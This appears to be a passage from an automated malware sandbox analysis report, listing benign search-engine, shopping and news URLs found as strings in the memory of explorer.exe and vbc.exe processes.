Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000007.00000002.2380506193.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000007.00000000.2195116890.0000000004F30000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2194501309.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://vachercher.lycos.fr/
Source: vbc.exe, vbc.exe, 00000005.00000000.2173313353.0000000000CF2000.00000020.00020000.sdmp, vbc.exe, 00000006.00000002.2218672810.0000000000CF2000.00000020.00020000.sdmp String found in binary or memory: http://validator.w3.org/check?uri=referer
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000007.00000000.2194501309.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000007.00000002.2380506193.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2194501309.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2194501309.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2200795359.000000000861C000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000007.00000000.2200795359.000000000861C000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
